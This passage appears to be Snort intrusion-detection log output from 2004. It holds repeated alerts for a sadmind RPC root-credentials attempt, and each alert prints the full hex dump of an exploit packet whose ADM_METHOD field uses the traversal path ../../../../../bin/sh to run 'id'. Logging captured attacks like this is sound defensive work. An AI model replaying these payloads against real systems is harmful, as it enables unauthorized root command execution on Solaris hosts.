: 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33324) [2004-06-21 12:33:50] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16185 flags=0 offset=0 TTL=49 chksum=13840 UDP: port=60738 -> dport: 32774 len=1456 Payload: length = 1448 000 : D4 FB 8C 18 00 00 00 00 00 00 00 02 00 01 87 88 ................ 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 97 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 9B 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33325) [2004-06-21 12:33:54] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16594 flags=0 offset=0 TTL=49 chksum=13431 UDP: port=60738 -> dport: 32775 len=1456 Payload: length = 1448 000 : CA B9 9F 0F 00 00 00 00 00 00 00 02 00 01 87 88 ................ 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33326) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16622 flags=0 offset=0 TTL=49 chksum=13403 UDP: port=60738 -> dport: 32776 len=1456 Payload: length = 1448 000 : D4 4B 93 A1 00 00 00 00 00 00 00 02 00 01 87 88 .K.............. 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0b0 : 00 00 00 3B 65 78 70 6C 6F 69 74 00 00 00 00 00 ...;exploit..... 0c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0f0 : 00 00 00 06 73 79 73 74 65 6D 00 00 00 00 00 15 ....system...... 100 : 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 2E 2E 2F 62 ../../../../../b 110 : 69 6E 2F 73 68 00 00 00 00 00 04 1A 00 00 00 0E in/sh........... 120 : 41 44 4D 5F 46 57 5F 56 45 52 53 49 4F 4E 00 00 ADM_FW_VERSION.. 130 : 00 00 00 03 00 00 00 04 00 00 00 01 00 00 00 00 ................ 140 : 00 00 00 00 00 00 00 08 41 44 4D 5F 4C 41 4E 47 ........ADM_LANG 150 : 00 00 00 09 00 00 00 02 00 00 00 01 43 00 00 00 ............C... 160 : 00 00 00 00 00 00 00 00 00 00 00 0D 41 44 4D 5F ............ADM_ 170 : 52 45 51 55 45 53 54 49 44 00 00 00 00 00 00 09 REQUESTID....... 180 : 00 00 00 12 00 00 00 11 30 38 31 30 3A 31 30 31 ........0810:101 190 : 30 31 30 31 30 31 30 3A 31 00 00 00 00 00 00 00 0101010:1....... 1a0 : 00 00 00 00 00 00 00 09 41 44 4D 5F 43 4C 41 53 ........ADM_CLAS 1b0 : 53 00 00 00 00 00 00 09 00 00 00 07 00 00 00 06 S............... 1c0 : 73 79 73 74 65 6D 00 00 00 00 00 00 00 00 00 00 system.......... 1d0 : 00 00 00 0E 41 44 4D 5F 43 4C 41 53 53 5F 56 45 ....ADM_CLASS_VE 1e0 : 52 53 00 00 00 00 00 09 00 00 00 04 00 00 00 03 RS.............. 1f0 : 32 2E 31 00 00 00 00 00 00 00 00 00 00 00 00 0A 2.1............. 200 : 41 44 4D 5F 4D 45 54 48 4F 44 00 00 00 00 00 09 ADM_METHOD...... 210 : 00 00 00 16 00 00 00 15 2E 2E 2F 2E 2E 2F 2E 2E ........../../.. 220 : 2F 2E 2E 2F 2E 2E 2F 62 69 6E 2F 73 68 00 00 00 /../../bin/sh... 230 : 00 00 00 00 00 00 00 00 00 00 00 08 41 44 4D 5F ............ADM_ 240 : 48 4F 53 54 00 00 00 09 00 00 00 3C 00 00 00 3B HOST.......<...; 250 : 65 78 70 6C 6F 69 74 00 00 00 00 00 00 00 00 00 exploit......... 260 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 270 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 280 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 290 : 00 00 00 00 00 00 00 0F 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2a0 : 4E 54 5F 48 4F 53 54 00 00 00 00 09 00 00 00 08 NT_HOST......... 2b0 : 00 00 00 07 65 78 70 6C 6F 69 74 00 00 00 00 00 ....exploit..... 2c0 : 00 00 00 00 00 00 00 11 41 44 4D 5F 43 4C 49 45 ........ADM_CLIE 2d0 : 4E 54 5F 44 4F 4D 41 49 4E 00 00 00 00 00 00 09 NT_DOMAIN....... 2e0 : 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 ................ 2f0 : 00 00 00 11 41 44 4D 5F 54 49 4D 45 4F 55 54 5F ....ADM_TIMEOUT_ 300 : 50 41 52 4D 53 00 00 00 00 00 00 09 00 00 00 1C PARMS........... 310 : 00 00 00 1B 54 54 4C 3D 30 20 50 54 4F 3D 32 30 ....TTL=0 PTO=20 320 : 20 50 43 4E 54 3D 32 20 50 44 4C 59 3D 33 30 00 PCNT=2 PDLY=30. 330 : 00 00 00 00 00 00 00 00 00 00 00 09 41 44 4D 5F ............ADM_ 340 : 46 45 4E 43 45 00 00 00 00 00 00 09 00 00 00 00 FENCE........... 350 : 00 00 00 00 00 00 00 00 00 00 00 01 58 00 00 00 ............X... 360 : 00 00 00 09 00 00 00 03 00 00 00 02 2D 63 00 00 ............-c.. 370 : 00 00 00 00 00 00 00 00 00 00 00 01 59 00 00 00 ............Y... 380 : 00 00 00 09 00 00 02 01 00 00 02 00 69 64 00 00 ............id.. 390 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 3f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 400 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 410 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 420 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 430 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 440 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 450 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 460 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 470 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 480 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 490 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4b0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4c0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4d0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4e0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 4f0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 500 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 510 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 520 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 530 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 540 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 550 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 560 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 570 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 580 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 590 : 00 00 00 00 00 00 00 10 6E 65 74 6D 67 74 5F 65 ........netmgt_e 5a0 : 6E 64 6F 66 61 72 67 73 ndofargs ------------------------------------------------------------------------------ #(1 - 33327) [2004-06-21 12:33:55] [snort/2256] RPC sadmind query with root credentials attempt UDP IPv4: 207.36.196.39 -> 68.82.247.65 hlen=5 TOS=0 dlen=1476 ID=16640 flags=0 offset=0 TTL=49 chksum=13385 UDP: port=60738 -> dport: 32777 len=1456 Payload: length = 1448 000 : FB 12 4F C0 00 00 00 00 00 00 00 02 00 01 87 88 ..O............. 010 : 00 00 00 0A 00 00 00 01 00 00 00 01 00 00 00 1C ................ 020 : 40 D7 86 9B 00 00 00 07 65 78 70 6C 6F 69 74 00 @.......exploit. 030 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 040 : 00 00 00 00 40 D7 86 9F 00 07 45 DF 00 00 00 00 ....@.....E..... 050 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 060 : 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 ................ 070 : 00 00 00 04 00 00 00 00 00 00 00 04 7F 00 00 01 ............... 080 : 00 01 87 88 00 00 00 0A 00 00 00 04 7F 00 00 01 ............... 090 : 00 01 87 88 00 00 00 0A 00 00 00 11 00 00 00 1E ................ 0a0 : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 